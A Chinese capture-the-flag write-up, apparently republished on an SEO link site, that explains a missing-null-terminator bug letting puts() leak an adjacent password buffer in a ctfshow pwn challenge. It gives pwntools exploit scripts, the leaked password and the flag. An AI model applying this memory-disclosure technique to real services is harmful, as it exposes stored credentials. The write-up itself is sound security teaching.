当前位置: 首页 > news >正文

昆山网站制作哪家强什么软件可以推广自己的产品

昆山网站制作哪家强,什么软件可以推广自己的产品,妻子2018高清免费视频,网上商城官网入口检查一下,32 位程序,开启 NX 保护 ida 反编译看伪代码 首先清空了 s、v5、s1 读取用户名到 v5 在 v5 中找 \n,找到则将其设置为 \0 在 v5 后面追加 \nInput your Password. 接下来打开 password.txt 读到 s 打印出 v5 即用户名 继续从…

检查一下,32 位程序,开启 NX 保护 

ida 反编译看伪代码

首先清空了 s、v5、s1

读取用户名到 v5

在 v5 中找 \n,找到则将其设置为 \0

在 v5 后面追加 \nInput your Password.

接下来打开 password.txt 读到 s

打印出 v5 即用户名

继续从标准输入读取内容到 s1

将 v5 的第一个元素设置为 0

比较 s1 和 s 是否相等,相等则执行 flag 函数

跟进 flag 函数看看:

flag 函数就是读取并打印 flag

那么漏洞点在哪儿,虽然我们 fgets 能输入的长度最大就是数组的大小

但是这个 puts 有问题,puts 需要遇到 \x00 才会停止

尽管前面会将我们输入到 v5 的内容的 \n 替换为 \0

但是如果我们直接将 v5 填充满,那么结尾的换行符就输不进去

那么就导致找不到换行符,进而截止标识 \x00 也没有

由于 puts 没有遇到 \x00,并且 s 就在 v5 下面

s 存储的是密码,就会被一起打印出来

测试一下,exp:

# @author:My6n
# @time:20250613
from pwn import *
context(arch = 'i386',os = 'linux',log_level = 'debug')
io = remote('pwn.challenge.ctf.show',28233)
payload = cyclic(0x100)
io.sendlineafter('Input your Username:\n',payload)
io.recvuntil('Welcome ')
passwd = io.recv()
print(passwd)

拿到密码:CTFshow_PWN_r00t_p@ssw0rd_1s_h3r3

拿到密码后再次连接,用户名随便输

密码输正确即可拿到 flag

flag:ctfshow{58368d5b-b049-406b-a415-e8a4929e6c91} 

当然也可以写一个一步到位的 exp:

# @author:My6n
# @time:20250613
from pwn import *
context(arch = 'i386',os = 'linux',log_level = 'debug')
io = remote('pwn.challenge.ctf.show',28233)
payload = cyclic(0x100)
io.sendlineafter('Input your Username:\n',payload)
io.recvuntil(',')
passwd = io.recv()[:33]
print(passwd)
io.close()
io = remote('pwn.challenge.ctf.show',28233)
io.sendlineafter('Input your Username:\n',b'test')
io.sendlineafter('Input your Password.\n',passwd)
io.interactive()

http://www.dinnco.com/news/64263.html

相关文章:

  • app线上推广方式排名优化外包公司
  • 网建设门户网站营销策略ppt模板
  • 做外围网站犯法吗长春seo按天计费
  • 百度网站权重查询东莞新闻头条新闻
  • 温州网站建设首选龙诚互联百度 站长工具
  • 在线申请网络优化器下载
  • 2345浏览器手机版seo技术服务外包
  • 自己的网站怎样做优化备案查询官网
  • 网站规划内容方案深圳优化公司排名
  • 安徽平台网站建设企业武汉网络关键词排名
  • 怎么建设投票网站百度广告联盟下载
  • html5的篮球网站开发上海seo优化公司kinglink
  • 扁平化网站设计欣赏山东seo费用多少
  • 企业的网站建设策划书百度推广怎么注册账号
  • wordpress 图片懒加载南宁seo排名优化
  • 淮南市住房与城乡建设部网站在线一键免费生成网页网站
  • 桃子网站logo制作网页的代码
  • 用模板做的网站多少钱网站建设报价
  • 哪些公司做网站佛山抖音seo
  • 怎么做网站 教学重庆seo是什么
  • 阿里云网站域名备案百度指数官网
  • 怎么做云购网站免费seo快速排名系统
  • 企业网站建站元素短视频代运营公司
  • 福州市疫情最新情况百度谷歌seo优化
  • 宁波建站模板企业网站建设方案模板
  • 网站建设实验后体会企业管理咨询培训
  • 东莞视频课程网站建设百度推广登录后台
  • 婚介网站建设google play下载
  • 公司没有自己的网站seo是什么意思职业
  • 重庆工程建设信息网证件查询优化网站服务